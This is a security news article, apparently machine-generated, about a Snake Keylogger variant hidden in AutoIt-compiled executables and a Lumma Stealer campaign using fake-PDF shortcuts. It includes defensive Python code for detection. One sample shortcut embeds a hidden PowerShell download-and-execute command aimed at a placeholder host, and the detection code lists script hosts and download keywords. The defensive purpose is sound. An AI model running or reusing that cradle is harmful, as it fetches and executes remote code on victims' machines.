

Ethical Hacking News

"Snake Keylogger Malware Evades Detection with AutoIt Scripting: A Growing Threat to Windows Users"



A new variant of the Snake Keylogger malware has been discovered that leverages AutoIt scripting to evade detection and target Windows users in several countries, including China, Turkey, Indonesia, Taiwan, and Spain. The malware has been responsible for over 280 million blocked infection attempts worldwide since its discovery at the start of the year.


  • Researchers have discovered a new variant of the Snake Keylogger malware that uses AutoIt scripting to evade detection.
  • The malware has been designed to specifically target Windows users in China, Turkey, Indonesia, Taiwan, and Spain.
  • The malware has been responsible for over 280 million blocked infection attempts worldwide since its discovery at the start of the year.
  • The malware is a type of keylogging malware that steals sensitive information from popular web browsers like Chrome, Edge, and Firefox.
  • AutoIt scripting makes it challenging for traditional detection mechanisms to identify and block the malware.
  • The malware persists on the system by dropping a copy of itself to a file and injecting its main payload into a legitimate .NET process using process hollowing.
  • The malware logs keystrokes, retrieves the victim's IP address and geolocation, and can be used to further compromise the victim's system or steal sensitive data.



    In a development that highlights the evolving nature of cyber threats, researchers have discovered a new variant of the Snake Keylogger malware that has been engineered to evade detection using AutoIt scripting. The variant targets Windows users located in China, Turkey, Indonesia, Taiwan, and Spain.

    According to Fortinet FortiGuard Labs, the new version of Snake Keylogger has been responsible for over 280 million blocked infection attempts worldwide since the start of the year. That figure measures the scale of the distribution campaign, not the number of successful compromises, but it is large enough that any organisation with Windows endpoints in the affected regions should expect to see the lure.

    Snake Keylogger is a keylogging malware designed to steal sensitive information from popular web browsers like Chrome, Edge, and Firefox. It captures keystrokes with a low-level keyboard hook (on Windows that is the WH_KEYBOARD_LL hook, installed through SetWindowsHookEx), which sees input system-wide regardless of which window has focus, so it can record sensitive input such as banking credentials as they are typed.

    What sets this variant apart from its predecessors is its use of AutoIt scripting to evade detection. AutoIt is a freeware scripting language for automating Windows tasks, and its scripts can be compiled into standalone executables that bundle the script with the AutoIt interpreter. In malware, that compiled form is the point: the malicious script and the payload it carries are embedded inside a generic AutoIt interpreter stub, so a static scanner sees an automation tool rather than the keylogger.

    This is what makes the variant hard for traditional detection mechanisms to identify and block. According to security researcher Kevin Su, "The use of AutoIt not only complicates static analysis by embedding the payload within the compiled script but also enables dynamic behavior that mimics benign automation tools."
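    The first triage question this raises for an analyst is simply "is this executable an AutoIt-compiled script at all?" The check below is an added example written for this page, not FortiGuard Labs' tooling. It looks for the markers that public YARA rules key on: the 16-byte signature that opens the compiled-script resource, the ASCII tag "AU3!EA06" that follows it, and the interpreter stub's own error string. A hit proves only that the file is an AutoIt runtime stub, which many legitimate admin tools are too; the next step is to extract and read the embedded script. The sample byte blobs are constructed stand-ins, not real samples.

```python
"""Triage check: is this PE a compiled AutoIt script?

Added example for this page, not FortiGuard Labs' code. Markers are the ones used by
public AutoIt YARA rules; presence means "AutoIt runtime stub", not "malicious".
"""
from pathlib import Path

# 16-byte signature at the start of the compiled-script resource, then the version tag.
AU3_MAGIC = bytes.fromhex("a3484bbe986c4aa9994c530a86d6487d")
AU3_TAG = b"AU3!EA06"
# Error string carried by every AutoIt3 interpreter stub.
AU3_STUB_MSG = b"This is a third-party compiled AutoIt script."


def autoit_markers(data: bytes) -> dict:
    """Offsets of each AutoIt marker present in the buffer (empty dict: none found)."""
    hits = {}
    for label, needle in (("magic", AU3_MAGIC), ("tag", AU3_TAG), ("stub_msg", AU3_STUB_MSG)):
        off = data.find(needle)
        if off != -1:
            hits[label] = off
    return hits


def classify(data: bytes) -> str:
    """Coarse verdict: not_pe / pe / autoit_stub / compiled_autoit_script."""
    if data[:2] != b"MZ":
        return "not_pe"
    hits = autoit_markers(data)
    if "magic" in hits and "tag" in hits:
        return "compiled_autoit_script"   # script container present: a payload is embedded
    if hits:
        return "autoit_stub"              # runtime strings only; script container not found
    return "pe"


def scan_file(path: str) -> str:
    """Classify one file on disk."""
    return classify(Path(path).read_bytes())


def scan_tree(root: str):
    """Yield (path, verdict) for every file under root that shows any AutoIt marker."""
    for p in Path(root).rglob("*"):
        if p.is_file():
            verdict = scan_file(str(p))
            if verdict in ("autoit_stub", "compiled_autoit_script"):
                yield str(p), verdict


def make_sample(with_script: bool) -> bytes:
    """Constructed stand-in for a PE (not a real binary): MZ header, stub message,
    and optionally the compiled-script container."""
    blob = b"MZ" + bytes(62) + b"PE\0\0" + bytes(64) + AU3_STUB_MSG + bytes(32)
    if with_script:
        blob += AU3_MAGIC + AU3_TAG + b"<compressed script body>"
    return blob


if __name__ == "__main__":
    print(classify(make_sample(True)), classify(make_sample(False)), classify(b"MZ" + bytes(100)))
```

    Run `scan_tree` over a user's Downloads or %LocalAppData% tree to list candidates; anything classified as `compiled_autoit_script` that did not arrive through a known software channel deserves script extraction before it is allowed to run.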

    Once launched, Snake Keylogger drops a copy of itself as "ageless.exe" in the folder "%Local_AppData%\supergroup" and writes a second file, "ageless.vbs", to the Windows Startup folder, so that the Visual Basic Script (VBS) relaunches the malware at every logon (the Startup folder runs at user logon, so the malware comes back after a reboot and also after a plain sign-out and sign-in).

    This persistence mechanism lets Snake Keylogger regain control of the compromised system and resume its activity even after its process is terminated. The malware then injects its main payload into a legitimate .NET process such as "regsvcs.exe" using process hollowing, so the malicious code runs under the name of a trusted, Microsoft-shipped binary. For a defender the tell is the parent-child relationship: the .NET Framework does not spawn regsvcs.exe from an executable sitting in a user's AppData folder.

    Snake Keylogger also logs keystrokes and queries services such as checkip.dyndns[.]org to learn the victim's public IP address and geolocation; a lookup of that service from a process that has no business making one is itself a useful network indicator. The collected data lets the attackers profile the victim, reuse stolen credentials, and further compromise the system.
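    The three behaviours just described (the Startup-folder VBS drop, the self-copy into %LocalAppData%, and the hollowed regsvcs.exe that then calls out to an IP-lookup service) all surface in ordinary endpoint telemetry. The rules below are an added example written for this page, not FortiGuard Labs' detection content. Events are plain dicts shaped like Sysmon fields (Event ID 1 process create, 11 file create, 22 DNS query); the sample events are constructed, and the list of .NET host binaries beyond regsvcs.exe and of IP-lookup domains beyond checkip.dyndns.org is an assumption you should tune for your estate. The rules key on the behaviour rather than the file names, so a renamed dropper still fires.

```python
"""Hunt the Snake Keylogger persistence/injection chain in endpoint telemetry.

Added example for this page, not FortiGuard Labs' content. Events mimic Sysmon
fields; SAMPLE_EVENTS are constructed for the example.
"""
import re
from pathlib import PureWindowsPath

# Per-user and all-users Startup folders both end in "...\Start Menu\Programs\Startup\".
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.I)
LOCAL_APPDATA = re.compile(r"\\users\\[^\\]+\\appdata\\local\\", re.I)
# Where a phished user's download or attachment typically runs from (assumption).
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(appdata|downloads|desktop)\\|\\windows\\temp\\", re.I)
SCRIPT_EXTS = {".vbs", ".js", ".jse", ".wsf", ".bat", ".cmd", ".lnk", ".hta"}
# regsvcs.exe is the host the page names; regasm.exe and installutil.exe are added
# here as sibling .NET Framework utilities (assumption).
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe"}
# checkip.dyndns.org is from the page; the others are added examples (assumption).
IP_LOOKUP_DOMAINS = {"checkip.dyndns.org", "api.ipify.org", "ifconfig.me"}


def _base(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def _ext(path: str) -> str:
    return PureWindowsPath(path).suffix.lower()


def detect(events: list) -> list:
    """Return one finding per matched rule: {'rule', 'index', 'detail'}."""
    findings = []
    for i, ev in enumerate(events):
        eid = ev.get("EventId")
        image = ev.get("Image", "")
        if eid == 11:  # file create
            target = ev.get("TargetFilename", "")
            if STARTUP_DIR.search(target) and _ext(target) in SCRIPT_EXTS:
                findings.append({"rule": "startup_script_drop", "index": i, "detail": target})
            if LOCAL_APPDATA.search(target) and _ext(target) == ".exe" and USER_WRITABLE.search(image):
                findings.append({"rule": "exe_self_copy_to_localappdata", "index": i, "detail": target})
        elif eid == 1:  # process create
            parent = ev.get("ParentImage", "")
            if _base(image) in DOTNET_HOSTS and USER_WRITABLE.search(parent):
                findings.append({"rule": "dotnet_host_from_user_dir", "index": i, "detail": parent})
        elif eid == 22:  # DNS query
            qname = ev.get("QueryName", "").lower()
            if qname in IP_LOOKUP_DOMAINS and _base(image) in DOTNET_HOSTS:
                findings.append({"rule": "ip_lookup_from_dotnet_host", "index": i, "detail": qname})
    return findings


# Constructed sample telemetry: the chain the page describes plus two benign events.
SAMPLE_EVENTS = [
    {"EventId": 11, "Image": r"C:\Users\alice\Downloads\Invoice_2025.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Local\supergroup\ageless.exe"},
    {"EventId": 11, "Image": r"C:\Users\alice\Downloads\Invoice_2025.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs"},
    {"EventId": 1, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\supergroup\ageless.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"'},
    {"EventId": 1, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe",   # benign: build tool
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "CommandLine": r"regsvcs.exe /tlb:Comp.tlb Comp.dll"},
    {"EventId": 11, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",     # benign: cache write
     "TargetFilename": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Cache\f_0001"},
    {"EventId": 22, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe",
     "QueryName": "checkip.dyndns.org"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f["rule"], f["index"], f["detail"])
```

    The benign regsvcs.exe launch from Visual Studio and Chrome's cache write are there on purpose: each rule needs the second condition (parent in a user-writable directory, executable extension) to stay quiet on them, and that is the condition to keep when you port the logic to your SIEM's query language.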

    In recent weeks, researchers have also observed other stealer malware distributed via obfuscated JavaScript files that harvest a wide range of sensitive data from compromised Windows systems and exfiltrate it to a Telegram bot operated by the attacker.

    The development comes as CloudSEK detailed a campaign that is exploiting compromised infrastructure associated with educational institutions to distribute malicious LNK files disguised as PDF documents to ultimately deploy the Lumma Stealer malware. The activity, targeting industries like finance, healthcare, technology, and media, is a multi-stage attack sequence that results in the theft of passwords, browser data, and cryptocurrency wallets.

    The campaign's primary infection vector is a malicious LNK (shortcut) file crafted to look like a PDF document. The files are hosted on a WebDAV server to which unsuspecting visitors are redirected from other sites. Opening the LNK runs a PowerShell command that connects to a remote server and retrieves the next stage, an obfuscated JavaScript file that in turn carries another PowerShell command; that command downloads Lumma Stealer from the same server and executes it.
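    A shortcut that looks like a PDF but launches PowerShell is cheap to spot if you read the shortcut's own metadata instead of trusting its icon. The parser below is an added example written for this page, not CloudSEK's tooling. It reads the ShellLinkHeader, skips the LinkTargetIDList and LinkInfo blocks, and decodes the StringData strings (MS-SHLLINK sections 2.1 to 2.4), which is where the target path and PowerShell arguments live, then applies three heuristics: a document extension hidden in front of ".lnk", a script host as the target, and arguments that hide the window or fetch remote content. The sample shortcut is built in the block itself; its URL is a placeholder, not an indicator from the campaign.

```python
"""Triage Windows .lnk files that pose as documents and launch a script host.

Added example for this page, not CloudSEK's code. Sample shortcuts are constructed
here; the URL is a placeholder.
"""
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_IDLIST, HAS_LINKINFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData fields in on-disk order, each with its LinkFlags bit.
STRING_FIELDS = (("name", 0x04), ("relative_path", 0x08), ("working_dir", 0x10),
                 ("arguments", 0x20), ("icon_location", 0x40))
SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript", "rundll32")
DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt")
REMOTE_OR_HIDDEN = ("-w hidden", "-windowstyle hidden", "bypass", "downloadstring", "iex", "http", "\\\\")


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shell link; ValueError if the header is not a .lnk."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76                                        # end of the fixed-size ShellLinkHeader
    if flags & HAS_IDLIST:                          # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:                        # LinkInfoSize (4 bytes) includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for name, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


def triage_lnk(filename: str, data: bytes) -> list:
    """Heuristic findings for one shortcut; an empty list means nothing suspicious."""
    fields = parse_lnk(data)
    findings = []
    lower = filename.lower()
    stem = lower[:-4] if lower.endswith(".lnk") else lower
    if stem.endswith(DOC_EXTS):
        findings.append("double extension: shortcut named like a document")
    launch = " ".join(fields.get(k, "") for k in ("relative_path", "arguments")).lower()
    if any(h in launch for h in SCRIPT_HOSTS):
        findings.append("target is a script host")
    if any(t in launch for t in REMOTE_OR_HIDDEN):
        findings.append("arguments hide the window or fetch remote content")
    return findings


def build_lnk(relative_path: str, arguments: str, icon_location: str) -> bytes:
    """Constructed minimal .lnk (unicode StringData only, no IDList/LinkInfo)."""
    flags = 0x08 | 0x20 | 0x40 | IS_UNICODE
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags) + bytes(52)

    def s(text: str) -> bytes:  # CountCharacters + UTF-16LE body
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + s(relative_path) + s(arguments) + s(icon_location)


# Constructed stand-in for the campaign's "PDF" shortcut; the URL is a placeholder.
MALICIOUS_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-w hidden -ep bypass -c \"IEX((New-Object Net.WebClient).DownloadString('http://example.invalid/s2'))\"",
    r"%ProgramFiles%\Adobe\Acrobat DC\Acrobat\Acrobat.exe",
)
BENIGN_LNK = build_lnk(r"..\..\..\Windows\System32\notepad.exe", "notes.txt",
                       r"%SystemRoot%\System32\notepad.exe")

if __name__ == "__main__":
    print(triage_lnk("Invoice_2025.pdf.lnk", MALICIOUS_LNK))
    print(triage_lnk("notes.lnk", BENIGN_LNK))
```

    The icon location is parsed but deliberately not scored: attackers set it to a PDF reader's icon, but so do legitimate shortcuts, and the decision should rest on what the shortcut runs. For mail-gateway or WebDAV-download inspection, feed the raw bytes to `triage_lnk` before the file ever reaches a user's desktop.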

    In short, the new Snake Keylogger variant changes its packaging rather than its goal: an AutoIt-compiled dropper, a Startup-folder VBS for persistence, process hollowing into regsvcs.exe, and a public-IP lookup before the stolen data leaves the machine. Each of those steps leaves an artifact a defender can look for on the endpoint or on the wire, and the same is true of the LNK-to-PowerShell chain that delivers Lumma Stealer.



    Related Information:

  • https://thehackernews.com/2025/02/new-snake-keylogger-variant-leverages.html


  • Published: Wed Feb 19 07:47:01 2025 by llama3.2 3B Q4_K_M


    © Ethical Hacking News . All rights reserved.
